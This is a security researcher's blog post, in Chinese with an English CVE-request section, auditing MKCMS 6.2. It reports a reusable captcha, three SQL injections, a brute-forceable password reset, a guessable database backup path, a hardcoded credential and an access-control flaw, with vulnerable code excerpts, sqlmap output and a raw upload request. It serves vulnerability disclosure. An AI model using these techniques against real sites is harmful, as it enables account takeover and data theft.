<!DOCTYPE html>



  


<html class="theme-next muse use-motion" lang="zh-Hans">
<head>
  <meta charset="UTF-8"/>
<meta http-equiv="X-UA-Compatible" content="IE=edge" />
<meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1"/>
<meta name="theme-color" content="#222">









<meta http-equiv="Cache-Control" content="no-transform" />
<meta http-equiv="Cache-Control" content="no-siteapp" />
















  
  
  <link href="/lib/fancybox/source/jquery.fancybox.css?v=2.1.5" rel="stylesheet" type="text/css" />







<link href="/lib/font-awesome/css/font-awesome.min.css?v=4.6.2" rel="stylesheet" type="text/css" />

<link href="/css/main.css?v=5.1.4" rel="stylesheet" type="text/css" />


  <link rel="apple-touch-icon" sizes="180x180" href="/images/apple-touch-icon-next.png?v=5.1.4">


  <link rel="icon" type="image/png" sizes="32x32" href="/images/favicon-32x32-next.png?v=5.1.4">


  <link rel="icon" type="image/png" sizes="16x16" href="/images/favicon-16x16-next.png?v=5.1.4">


  <link rel="mask-icon" href="/images/logo.svg?v=5.1.4" color="#222">





  <meta name="keywords" content="Hexo, NexT" />










<meta name="description" content="原文首发于先知社区MKCMS 代码审计小结 - 先知社区  MKCMS V6.2    (以下源码来自网络)MKCMS 米酷影视源码 6.2 开源 CMS下载地址链接：https:&#x2F;&#x2F;pan.baidu.com&#x2F;s&#x2F;1cZX5x9SbcXMCMXismfH4ow   提取码：k3ox备用下载地址：https:&#x2F;&#x2F;www.lanzous.com&#x2F;ib7zwmh  0x00 全局过滤分析&#x2F;system">
<meta property="og:type" content="article">
<meta property="og:title" content="MKCMS代码审计小结【CVE】">
<meta property="og:url" content="http://unc1e.com/2020/04/10/yuque/MKCMS%E4%BB%A3%E7%A0%81%E5%AE%A1%E8%AE%A1%E5%B0%8F%E7%BB%93%E3%80%90CVE%E3%80%91/index.html">
<meta property="og:site_name" content="Unc1e的博客">
<meta property="og:description" content="原文首发于先知社区MKCMS 代码审计小结 - 先知社区  MKCMS V6.2    (以下源码来自网络)MKCMS 米酷影视源码 6.2 开源 CMS下载地址链接：https:&#x2F;&#x2F;pan.baidu.com&#x2F;s&#x2F;1cZX5x9SbcXMCMXismfH4ow   提取码：k3ox备用下载地址：https:&#x2F;&#x2F;www.lanzous.com&#x2F;ib7zwmh  0x00 全局过滤分析&#x2F;system">
<meta property="og:image" content="https://cdn.nlark.com/yuque/0/2020/png/166008/1586576535561-9161a459-66b4-4503-b922-836306186781.png#align=left&display=inline&height=325&margin=%5Bobject%20Object%5D&name=image.png&originHeight=650&originWidth=1320&size=214227&status=done&style=none&width=660">
<meta property="og:image" content="https://cdn.nlark.com/yuque/0/2020/png/166008/1586527513750-5968d776-6be5-4cab-bdec-e2f61f12998c.png#align=left&display=inline&height=107&margin=%5Bobject%20Object%5D&name=image.png&originHeight=214&originWidth=1004&size=34379&status=done&style=none&width=502">
<meta property="og:image" content="https://cdn.nlark.com/yuque/0/2020/png/166008/1586526980113-b6ec9c98-72ea-4dac-926d-b2eef01f0227.png#align=left&display=inline&height=369&margin=%5Bobject%20Object%5D&name=image.png&originHeight=737&originWidth=1060&size=124791&status=done&style=none&width=530">
<meta property="og:image" content="https://cdn.nlark.com/yuque/0/2020/png/166008/1586529907632-efc6c088-ccac-49d1-9a5e-192abfb8293d.png#align=left&display=inline&height=334&margin=%5Bobject%20Object%5D&name=image.png&originHeight=668&originWidth=1917&size=144360&status=done&style=none&width=958.5">
<meta property="og:image" content="https://cdn.nlark.com/yuque/0/2020/png/166008/1586531781382-73625b5c-3937-4196-bbc2-6cf8f6502f37.png#align=left&display=inline&height=447&margin=%5Bobject%20Object%5D&name=image.png&originHeight=894&originWidth=1496&size=302207&status=done&style=none&width=748">
<meta property="og:image" content="https://cdn.nlark.com/yuque/0/2020/png/166008/1586532921372-d8f79355-fc36-4612-8234-3a24d17571ba.png#align=left&display=inline&height=118&margin=%5Bobject%20Object%5D&name=image.png&originHeight=236&originWidth=1235&size=43156&status=done&style=none&width=617.5">
<meta property="og:image" content="https://cdn.nlark.com/yuque/0/2020/png/166008/1586533096304-2b6954a4-c78e-43ed-a0a0-39d0b69ec5c7.png#align=left&display=inline&height=108&margin=%5Bobject%20Object%5D&name=image.png&originHeight=216&originWidth=711&size=31578&status=done&style=none&width=355.5">
<meta property="og:image" content="https://cdn.nlark.com/yuque/0/2020/png/166008/1586684264225-6679e12b-ad44-4554-9c50-fffeb4a39bcd.png#align=left&display=inline&height=166&margin=%5Bobject%20Object%5D&name=image.png&originHeight=332&originWidth=1277&size=86137&status=done&style=none&width=638.5">
<meta property="og:image" content="https://cdn.nlark.com/yuque/0/2020/png/166008/1586685476288-83c13069-03f6-4f34-8897-0f0830027cee.png#align=left&display=inline&height=252&margin=%5Bobject%20Object%5D&name=image.png&originHeight=504&originWidth=1232&size=117091&status=done&style=none&width=616">
<meta property="og:image" content="https://cdn.nlark.com/yuque/0/2020/png/166008/1586581112081-f4a882d1-ad62-40f9-9a0c-d9188bad1a68.png#align=left&display=inline&height=897&margin=%5Bobject%20Object%5D&name=%E6%B7%B1%E5%BA%A6%E6%88%AA%E5%9B%BE_%E9%80%89%E6%8B%A9%E5%8C%BA%E5%9F%9F_20200411125718.png&originHeight=897&originWidth=1911&size=139025&status=done&style=none&width=1911">
<meta property="og:image" content="https://cdn.nlark.com/yuque/0/2020/png/166008/1586576676672-8bef147b-e4c1-4e41-951b-38e9cc20e422.png#align=left&display=inline&height=438&margin=%5Bobject%20Object%5D&name=image.png&originHeight=876&originWidth=1189&size=159520&status=done&style=none&width=594.5">
<meta property="article:published_time" content="2020-04-10T13:55:55.000Z">
<meta property="article:modified_time" content="2020-07-16T02:35:52.365Z">
<meta property="article:author" content="Unc1e">
<meta name="twitter:card" content="summary">
<meta name="twitter:image" content="https://cdn.nlark.com/yuque/0/2020/png/166008/1586576535561-9161a459-66b4-4503-b922-836306186781.png#align=left&display=inline&height=325&margin=%5Bobject%20Object%5D&name=image.png&originHeight=650&originWidth=1320&size=214227&status=done&style=none&width=660">



<script type="text/javascript" id="hexo.configurations">
  var NexT = window.NexT || {};
  var CONFIG = {
    root: '/',
    scheme: 'Muse',
    version: '5.1.4',
    sidebar: {"position":"left","display":"post","offset":12,"b2t":false,"scrollpercent":false,"onmobile":false},
    fancybox: true,
    tabs: true,
    motion: {"enable":true,"async":false,"transition":{"post_block":"fadeIn","post_header":"slideDownIn","post_body":"slideDownIn","coll_header":"slideLeftIn","sidebar":"slideUpIn"}},
    duoshuo: {
      userId: '0',
      author: '博主'
    },
    algolia: {
      applicationID: '',
      apiKey: '',
      indexName: '',
      hits: {"per_page":10},
      labels: {"input_placeholder":"Search for Posts","hits_empty":"We didn't find any results for the search: ${query}","hits_stats":"${hits} results found in ${time} ms"}
    }
  };
</script>



  <link rel="canonical" href="http://unc1e.com/2020/04/10/yuque/MKCMS代码审计小结【CVE】/"/>





  <title>MKCMS代码审计小结【CVE】 | Unc1e的博客</title>
  








<meta name="generator" content="Hexo 4.2.1"><link rel="stylesheet" href="/css/prism.css" type="text/css"></head>

<body itemscope itemtype="http://schema.org/WebPage" lang="zh-Hans">

  
  
    
  

  <div class="container sidebar-position-left page-post-detail">
    <div class="headband"></div>

    <header id="header" class="header" itemscope itemtype="http://schema.org/WPHeader">
      <div class="header-inner"><div class="site-brand-wrapper">
  <div class="site-meta ">
    

    <div class="custom-logo-site-title">
      <a href="/"  class="brand" rel="start">
        <span class="logo-line-before"><i></i></span>
        <span class="site-title">Unc1e的博客</span>
        <span class="logo-line-after"><i></i></span>
      </a>
    </div>
      
        <p class="site-subtitle"></p>
      
  </div>

  <div class="site-nav-toggle">
    <button>
      <span class="btn-bar"></span>
      <span class="btn-bar"></span>
      <span class="btn-bar"></span>
    </button>
  </div>
</div>

<nav class="site-nav">
  

  
    <ul id="menu" class="menu">
      
        
        <li class="menu-item menu-item-home">
          <a href="/%20" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-home"></i> <br />
            
            首页
          </a>
        </li>
      
        
        <li class="menu-item menu-item-archives">
          <a href="/archives/%20" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-archive"></i> <br />
            
            归档
          </a>
        </li>
      

      
    </ul>
  

  
</nav>



 </div>
    </header>

    <main id="main" class="main">
      <div class="main-inner">
        <div class="content-wrap">
          <div id="content" class="content">
            

  <div id="posts" class="posts-expand">
    

  

  
  
  

  <article class="post post-type-normal" itemscope itemtype="http://schema.org/Article">
  
  
  
  <div class="post-block">
    <link itemprop="mainEntityOfPage" href="http://unc1e.com/2020/04/10/yuque/MKCMS%E4%BB%A3%E7%A0%81%E5%AE%A1%E8%AE%A1%E5%B0%8F%E7%BB%93%E3%80%90CVE%E3%80%91/">

    <span hidden itemprop="author" itemscope itemtype="http://schema.org/Person">
      <meta itemprop="name" content="Unc1e">
      <meta itemprop="description" content="">
      <meta itemprop="image" content="/images/avatar.gif">
    </span>

    <span hidden itemprop="publisher" itemscope itemtype="http://schema.org/Organization">
      <meta itemprop="name" content="Unc1e的博客">
    </span>

    
      <header class="post-header">

        
        
          <h1 class="post-title" itemprop="name headline">MKCMS代码审计小结【CVE】</h1>
        

        <div class="post-meta">
          <span class="post-time">
            
              <span class="post-meta-item-icon">
                <i class="fa fa-calendar-o"></i>
              </span>
              
                <span class="post-meta-item-text">发表于</span>
              
              <time title="创建于" itemprop="dateCreated datePublished" datetime="2020-04-10T21:55:55+08:00">
                2020-04-10
              </time>
            

            

            
          </span>

          

          
            
          

          
          

          

          

          

        </div>
      </header>
    

    
    
    
    <div class="post-body" itemprop="articleBody">

      
      

      
        <p>原文首发于先知社区<a href="https://xz.aliyun.com/t/7580" target="_blank" rel="noopener">MKCMS 代码审计小结 - 先知社区</a></p>
<blockquote>
<p>MKCMS V6.2    (以下源码来自网络)<br>MKCMS 米酷影视源码 6.2 开源 CMS<br>下载地址链接：<a href="https://pan.baidu.com/s/1cZX5x9SbcXMCMXismfH4ow" target="_blank" rel="noopener">https://pan.baidu.com/s/1cZX5x9SbcXMCMXismfH4ow</a>   提取码：k3ox<br>备用下载地址：<a href="https://www.lanzous.com/ib7zwmh" target="_blank" rel="noopener">https://www.lanzous.com/ib7zwmh</a></p>
</blockquote>
<h1 id="0x00-全局过滤分析"><a href="#0x00-全局过滤分析" class="headerlink" title="0x00 全局过滤分析"></a>0x00 全局过滤分析</h1><p><code>/system/library.php:</code>使用<code>addslashes</code>转义入参, 注意到<code>$_SERVER</code>未被过滤</p>
<p>#</p>
<p><img src="https://cdn.nlark.com/yuque/0/2020/png/166008/1586576535561-9161a459-66b4-4503-b922-836306186781.png#align=left&display=inline&height=325&margin=%5Bobject%20Object%5D&name=image.png&originHeight=650&originWidth=1320&size=214227&status=done&style=none&width=660" alt="image.png"></p>
<h1 id="0x01-验证码重用"><a href="#0x01-验证码重用" class="headerlink" title="0x01 验证码重用"></a>0x01 验证码重用</h1><p><code>/admin/cms_login.php</code>验证码处的逻辑如下，比较 session 中的验证码和输入的是否一致，不一致就进入<code>alert_href</code>，这个<code>js</code>跳转，实际是在刷新页面</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br></pre></td><td class="code"><pre><span class="line">/admin/cms_login.php:</span><br><span class="line"><span class="meta">&lt;?php</span></span><br><span class="line"> <span class="number">6</span>   ...</span><br><span class="line"> <span class="number">7</span>  <span class="keyword">if</span>(<span class="keyword">isset</span>($_POST[<span class="string">'submit'</span>]))&#123;</span><br><span class="line"> <span class="number">8</span>:     <span class="keyword">if</span> ($_SESSION[<span class="string">'verifycode'</span>] != $_POST[<span class="string">'verifycode'</span>]) &#123;</span><br><span class="line"> <span class="number">9</span>  		alert_href(<span class="string">'验证码错误'</span>,<span class="string">'cms_login.php'</span>);</span><br><span class="line"><span class="number">10</span>  	&#125;</span><br><span class="line">   ...</span><br></pre></td></tr></table></figure>

<p><img src="https://cdn.nlark.com/yuque/0/2020/png/166008/1586527513750-5968d776-6be5-4cab-bdec-e2f61f12998c.png#align=left&display=inline&height=107&margin=%5Bobject%20Object%5D&name=image.png&originHeight=214&originWidth=1004&size=34379&status=done&style=none&width=502" alt="image.png"><br>跳转后就会刷新验证码，然而我用的是 burp，默认是不解析 js 的</p>
<p>全局搜索这个<code>$_SESSION[&#39;verifycode&#39;]</code>，发现只在<code>/system/verifycode.php</code>有赋值，也就是说，如果使用验证码后，我们不跟随<code>js</code>跳转，就不会重置验证码，<strong>验证码也就能被重复使用</strong>了<br><img src="https://cdn.nlark.com/yuque/0/2020/png/166008/1586526980113-b6ec9c98-72ea-4dac-926d-b2eef01f0227.png#align=left&display=inline&height=369&margin=%5Bobject%20Object%5D&name=image.png&originHeight=737&originWidth=1060&size=124791&status=done&style=none&width=530" alt="image.png"><br>使用 burp 重放，的确如此，验证码形同虚设</p>
<h1 id="0x02-前台注入-1：-ucenter-repass-php"><a href="#0x02-前台注入-1：-ucenter-repass-php" class="headerlink" title="0x02 前台注入 1：/ucenter/repass.php"></a>0x02 前台注入 1：<code>/ucenter/repass.php</code></h1><p>看了下历史的漏洞，在<code>/ucenter/repass.php</code>有个越权修改密码的洞（<a href="https://nvd.nist.gov/vuln/detail/CVE-2019-11332" target="_blank" rel="noopener">CVE-2019-11332</a>），跟进去发现原来还有注入，以下是分析过程</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br></pre></td><td class="code"><pre><span class="line">/ucenter/repass.php</span><br><span class="line"><span class="meta">&lt;?php</span></span><br><span class="line">...</span><br><span class="line"><span class="keyword">if</span>(<span class="keyword">isset</span>($_POST[<span class="string">'submit'</span>]))&#123;</span><br><span class="line">$username = stripslashes(trim($_POST[<span class="string">'name'</span>]));</span><br><span class="line">$email = trim($_POST[<span class="string">'email'</span>]);</span><br><span class="line"><span class="comment">// 检测用户名是否存在</span></span><br><span class="line">$query = mysql_query(<span class="string">"select u_id from mkcms_user where u_name='$username' and u_email='$email'"</span>);</span><br><span class="line">  ...</span><br></pre></td></tr></table></figure>

<p>前面说到全局对<code>$_POST</code>存在<code>addslash</code>的过滤（加<code>\</code>转义），上面又把参数给<code>stripslashes</code>了(去掉<code>\</code>），这不就是个注入？<br><img src="https://cdn.nlark.com/yuque/0/2020/png/166008/1586529907632-efc6c088-ccac-49d1-9a5e-192abfb8293d.png#align=left&display=inline&height=334&margin=%5Bobject%20Object%5D&name=image.png&originHeight=668&originWidth=1917&size=144360&status=done&style=none&width=958.5" alt="image.png"><br>后来复盘，实际上，这个问题<code>coolcat</code>师傅早在去年就在先知上提出来了：<a href="https://xz.aliyun.com/t/4189#toc-1" target="_blank" rel="noopener">某 KCMS5.0 代码审计 (前台注入&amp;任意用户密码重置)，</a>师傅 nb！</p>
<h1 id="0x03-前台注入-2：-ucenter-active-php"><a href="#0x03-前台注入-2：-ucenter-active-php" class="headerlink" title="0x03 前台注入 2：/ucenter/active.php"></a>0x03 前台注入 2：/ucenter/active.php</h1><p><code>/ucenter/active.php?verify=1</code>存在注入</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br></pre></td><td class="code"><pre><span class="line">/ucenter/active.php</span><br><span class="line"><span class="meta">&lt;?php</span></span><br><span class="line">...</span><br><span class="line">$verify = stripslashes(trim($_GET[<span class="string">'verify'</span>]));	<span class="comment">//去掉了转义用的\</span></span><br><span class="line">$nowtime = time();</span><br><span class="line">$query = mysql_query(<span class="string">"select u_id from mkcms_user where u_question='$verify'"</span>);</span><br><span class="line">$row = mysql_fetch_array($query);</span><br><span class="line">...</span><br></pre></td></tr></table></figure>

<p>sqlmap 直接跑即可</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">[INFO] GET parameter <span class="string">'verify'</span> appears to be <span class="string">'MySQL &gt;= 5.0.12 AND time-based blind (query SLEEP)'</span> injectable</span><br><span class="line">[INFO] GET parameter <span class="string">'verify'</span> is <span class="string">'Generic UNION query (NULL) - 1 to 20 columns'</span> injectable</span><br></pre></td></tr></table></figure>

<h1 id="0x04-前台注入-3：-ucenter-reg-php"><a href="#0x04-前台注入-3：-ucenter-reg-php" class="headerlink" title="0x04 前台注入 3：/ucenter/reg.php"></a>0x04 前台注入 3：/ucenter/reg.php</h1><p><code>/ucenter/reg.php</code>的<code>name</code>参数，存在注入</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br></pre></td><td class="code"><pre><span class="line">/ucenter/reg.php</span><br><span class="line"><span class="meta">&lt;?php</span></span><br><span class="line">...</span><br><span class="line"><span class="keyword">if</span>(<span class="keyword">isset</span>($_POST[<span class="string">'submit'</span>]))&#123;</span><br><span class="line">$username = stripslashes(trim($_POST[<span class="string">'name'</span>]));</span><br><span class="line"><span class="comment">// 检测用户名是否存在</span></span><br><span class="line">$query = mysql_query(<span class="string">"select u_id from mkcms_user where u_name='$username'"</span>);</span><br><span class="line">  ...</span><br></pre></td></tr></table></figure>

<h1 id="0x05-任意用户密码找回（密码可被穷举）"><a href="#0x05-任意用户密码找回（密码可被穷举）" class="headerlink" title="0x05 任意用户密码找回（密码可被穷举）"></a>0x05 任意用户密码找回（密码可被穷举）</h1><p>任意用户密码找回<br>这个问题主要是<code>/ucenter/repass.php</code>代码里，找回密码的逻辑有问题，第 10 行查询到<code>username</code>、 <code>email</code>能对应上之后，14 行就直接重置密码了。。。而且密码的范围在 12 行有写，只有 90000 种可能，重置之后，burp 跑一下不就 ok 了？（当然要结合验证码重用才能有效爆破）<br><img src="https://cdn.nlark.com/yuque/0/2020/png/166008/1586531781382-73625b5c-3937-4196-bbc2-6cf8f6502f37.png#align=left&display=inline&height=447&margin=%5Bobject%20Object%5D&name=image.png&originHeight=894&originWidth=1496&size=302207&status=done&style=none&width=748" alt="image.png"></p>
<h1 id="0x06-备份文件路径可猜解"><a href="#0x06-备份文件路径可猜解" class="headerlink" title="0x06 备份文件路径可猜解"></a>0x06 备份文件路径可猜解</h1><p>这个备份功能也太顶了，而且还是那么简单的文件名<br><code>/backupdata/movie.sql</code></p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br></pre></td><td class="code"><pre><span class="line">/admin/cms_backup.php</span><br><span class="line"><span class="meta">&lt;?php</span></span><br><span class="line">$filename=<span class="string">"../backupdata/"</span>.DATA_NAME.<span class="string">".sql"</span>; <span class="comment">//存放路径，默认存放到项目最外层</span></span><br><span class="line">$fp = fopen($filename,<span class="string">'w'</span>);</span><br><span class="line">fputs($fp,$mysql);</span><br><span class="line">fclose($fp);</span><br><span class="line">alert_href(<span class="string">'备份成功!'</span>,<span class="string">'cms_data.php'</span>);</span><br><span class="line"><span class="meta">?&gt;</span></span><br></pre></td></tr></table></figure>

<p>全局搜<code>DATA_NAME</code>变量，是安装时候设置的数据库名<br><img src="https://cdn.nlark.com/yuque/0/2020/png/166008/1586532921372-d8f79355-fc36-4612-8234-3a24d17571ba.png#align=left&display=inline&height=118&margin=%5Bobject%20Object%5D&name=image.png&originHeight=236&originWidth=1235&size=43156&status=done&style=none&width=617.5" alt="image.png"></p>
<p>默认的<code>DATA_NAME</code>值是<code>movie</code><br><img src="https://cdn.nlark.com/yuque/0/2020/png/166008/1586533096304-2b6954a4-c78e-43ed-a0a0-39d0b69ec5c7.png#align=left&display=inline&height=108&margin=%5Bobject%20Object%5D&name=image.png&originHeight=216&originWidth=711&size=31578&status=done&style=none&width=355.5" alt="image.png"></p>
<h1 id="0x07-前台文件上传"><a href="#0x07-前台文件上传" class="headerlink" title="0x07 前台文件上传"></a>0x07 前台文件上传</h1><p><code>/editor/php/upload_json.php?dir=file</code><br>源码如下</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">&lt;?php</span></span><br><span class="line">$ext_arr = <span class="keyword">array</span>(</span><br><span class="line">	<span class="string">'image'</span> =&gt; <span class="keyword">array</span>(<span class="string">'gif'</span>, <span class="string">'jpg'</span>, <span class="string">'jpeg'</span>, <span class="string">'png'</span>, <span class="string">'bmp'</span>),</span><br><span class="line">	<span class="string">'flash'</span> =&gt; <span class="keyword">array</span>(<span class="string">'swf'</span>, <span class="string">'flv'</span>),</span><br><span class="line">	<span class="string">'media'</span> =&gt; <span class="keyword">array</span>(<span class="string">'swf'</span>, <span class="string">'flv'</span>, <span class="string">'mp3'</span>, <span class="string">'wav'</span>, <span class="string">'wma'</span>, <span class="string">'wmv'</span>, <span class="string">'mid'</span>, <span class="string">'avi'</span>, <span class="string">'mpg'</span>, <span class="string">'asf'</span>, <span class="string">'rm'</span>, <span class="string">'rmvb'</span>),</span><br><span class="line">	<span class="string">'file'</span> =&gt; <span class="keyword">array</span>(<span class="string">'doc'</span>, <span class="string">'docx'</span>, <span class="string">'xls'</span>, <span class="string">'xlsx'</span>, <span class="string">'ppt'</span>, <span class="string">'htm'</span>, <span class="string">'html'</span>, <span class="string">'txt'</span>, <span class="string">'zip'</span>, <span class="string">'rar'</span>, <span class="string">'gz'</span>, <span class="string">'bz2'</span> ,<span class="string">'7z'</span>),</span><br><span class="line">);</span><br><span class="line">...</span><br><span class="line">$file_name = $_FILES[<span class="string">'imgFile'</span>][<span class="string">'name'</span>];</span><br><span class="line">...</span><br><span class="line"><span class="comment">//获得文件扩展名</span></span><br><span class="line">	$temp_arr = explode(<span class="string">"."</span>, $file_name);</span><br><span class="line">	$file_ext = array_pop($temp_arr);</span><br><span class="line">	$file_ext = trim($file_ext); <span class="comment">/*将file_ext转换为字符串。。。无弱类型问题了**/</span></span><br><span class="line">	$file_ext = strtolower($file_ext);  <span class="comment">//将file_ext转换为字符串。。。无弱类型问题了</span></span><br><span class="line">	<span class="comment">//检查扩展名，是否在大的数组中，in_array存在若类型问题</span></span><br><span class="line">	<span class="keyword">if</span> (in_array($file_ext, $ext_arr[$dir_name]) === <span class="keyword">false</span>) &#123;</span><br><span class="line">		alert(<span class="string">"上传文件扩展名是不允许的扩展名。\n只允许"</span> . implode(<span class="string">","</span>, $ext_arr[$dir_name]) . <span class="string">"格式。"</span>);</span><br><span class="line">	&#125;result</span><br><span class="line">  ...</span><br></pre></td></tr></table></figure>

<p>可以上传列表里的文件，只是无法拿 shell</p>
<figure class="highlight http"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">POST</span> <span class="string">/editor/php/upload_json.php?dir=file</span> HTTP/1.1</span><br><span class="line"><span class="attribute">Host</span>: localhost</span><br><span class="line"><span class="attribute">Content-Length</span>: 306</span><br><span class="line"><span class="attribute">Cache-Control</span>: max-age=0</span><br><span class="line"><span class="attribute">Upgrade-Insecure-Requests</span>: 1</span><br><span class="line"><span class="attribute">Content-Type</span>: multipart/form-data; boundary=----WebKitFormBoundaryni3BwmVzIUwKfSSC</span><br><span class="line"><span class="attribute">Accept</span>: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9</span><br><span class="line"><span class="attribute">Accept-Encoding</span>: gzip, deflate</span><br><span class="line"><span class="attribute">Accept-Language</span>: zh-CN,zh;q=0.9</span><br><span class="line"><span class="attribute">Connection</span>: close</span><br><span class="line"></span><br><span class="line">------WebKitFormBoundaryni3BwmVzIUwKfSSC</span><br><span class="line"><span class="attribute">Content-Disposition</span>: form-data; name="imgFile"; filename="1.jpg.html"</span><br><span class="line"><span class="attribute">Content-Type</span>: application/octet-stream</span><br><span class="line"></span><br><span class="line"><span class="attribute">11111111</span></span><br><span class="line"><span class="attribute">------WebKitFormBoundaryni3BwmVzIUwKfSSC</span></span><br><span class="line"><span class="attribute">Content-Disposition</span>: form-data; name="upload"</span><br><span class="line"></span><br><span class="line"><span class="attribute">Send</span></span><br><span class="line"><span class="attribute">------WebKitFormBoundaryni3BwmVzIUwKfSSC--</span></span><br></pre></td></tr></table></figure>

<p>出现上传链接</p>
<h1 id="0x08-凭据硬编码"><a href="#0x08-凭据硬编码" class="headerlink" title="0x08 凭据硬编码"></a>0x08 凭据硬编码</h1><p><code>/ucenter/yanzhengma.php</code>, 把密码硬编码在里面了，经过测试，可登录（<del>狗头保命</del><img src="https://cdn.nlark.com/yuque/0/2020/png/166008/1586684264225-6679e12b-ad44-4554-9c50-fffeb4a39bcd.png#align=left&display=inline&height=166&margin=%5Bobject%20Object%5D&name=image.png&originHeight=332&originWidth=1277&size=86137&status=done&style=none&width=638.5" alt="image.png"></p>
<h1 id="0x09-越权"><a href="#0x09-越权" class="headerlink" title="0x09 越权"></a>0x09 越权</h1><p><code>/ucenter/mingxi.php</code><br>会员卡信息仅由用户传入的参数确定，一定存在越权漏洞</p>
<p><img src="https://cdn.nlark.com/yuque/0/2020/png/166008/1586685476288-83c13069-03f6-4f34-8897-0f0830027cee.png#align=left&display=inline&height=252&margin=%5Bobject%20Object%5D&name=image.png&originHeight=504&originWidth=1232&size=117091&status=done&style=none&width=616" alt="image.png"></p>
<hr>
<h1 id="CVE-Request-English-Version"><a href="#CVE-Request-English-Version" class="headerlink" title="CVE Request : English Version"></a>CVE Request : English Version</h1><blockquote>
<p>Source code can be downloaded  at  <a href="https://www.lanzous.com/ib7zwmh" target="_blank" rel="noopener">https://www.lanzous.com/ib7zwmh</a></p>
</blockquote>
<p><img src="https://cdn.nlark.com/yuque/0/2020/png/166008/1586581112081-f4a882d1-ad62-40f9-9a0c-d9188bad1a68.png#align=left&display=inline&height=897&margin=%5Bobject%20Object%5D&name=%E6%B7%B1%E5%BA%A6%E6%88%AA%E5%9B%BE_%E9%80%89%E6%8B%A9%E5%8C%BA%E5%9F%9F_20200411125718.png&originHeight=897&originWidth=1911&size=139025&status=done&style=none&width=1911" alt="深度截图_选择区域_20200411125718.png"></p>
<h1 id="0x00-Lead-In"><a href="#0x00-Lead-In" class="headerlink" title="0x00:Lead In"></a>0x00:Lead In</h1><p>This CMS is kinda funny, coz there is a universal filter <code>addslashes</code>  in <code>/system/library.php</code></p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br></pre></td><td class="code"><pre><span class="line">/system/library.php</span><br><span class="line"><span class="meta">&lt;?php</span></span><br><span class="line">...</span><br><span class="line"><span class="keyword">if</span> (!get_magic_quotes_gpc()) &#123;</span><br><span class="line">	<span class="keyword">if</span> (!<span class="keyword">empty</span>($_GET)) &#123;</span><br><span class="line">		$_GET = addslashes_deep($_GET);</span><br><span class="line">	&#125;</span><br><span class="line">	<span class="keyword">if</span> (!<span class="keyword">empty</span>($_POST)) &#123;</span><br><span class="line">		$_POST = addslashes_deep($_POST);</span><br><span class="line">	&#125;</span><br><span class="line">	$_COOKIE = addslashes_deep($_COOKIE);</span><br><span class="line">	$_REQUEST = addslashes_deep($_REQUEST);</span><br><span class="line">&#125;</span><br><span class="line"><span class="function"><span class="keyword">function</span> <span class="title">addslashes_deep</span><span class="params">($_var_0)</span></span></span><br><span class="line"><span class="function"></span>&#123;</span><br><span class="line">	<span class="keyword">if</span> (<span class="keyword">empty</span>($_var_0)) &#123;</span><br><span class="line">		<span class="keyword">return</span> $_var_0;</span><br><span class="line">	&#125; <span class="keyword">else</span> &#123;</span><br><span class="line">		<span class="keyword">return</span> is_array($_var_0) ? array_map(<span class="string">'addslashes_deep'</span>, $_var_0) : addslashes($_var_0);</span><br><span class="line">	&#125;_var_0</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>

<p>While it uses <code>stripslashes</code> somewhere by mistake, let’s do a global search about it, we get** 3 SQL injections **</p>
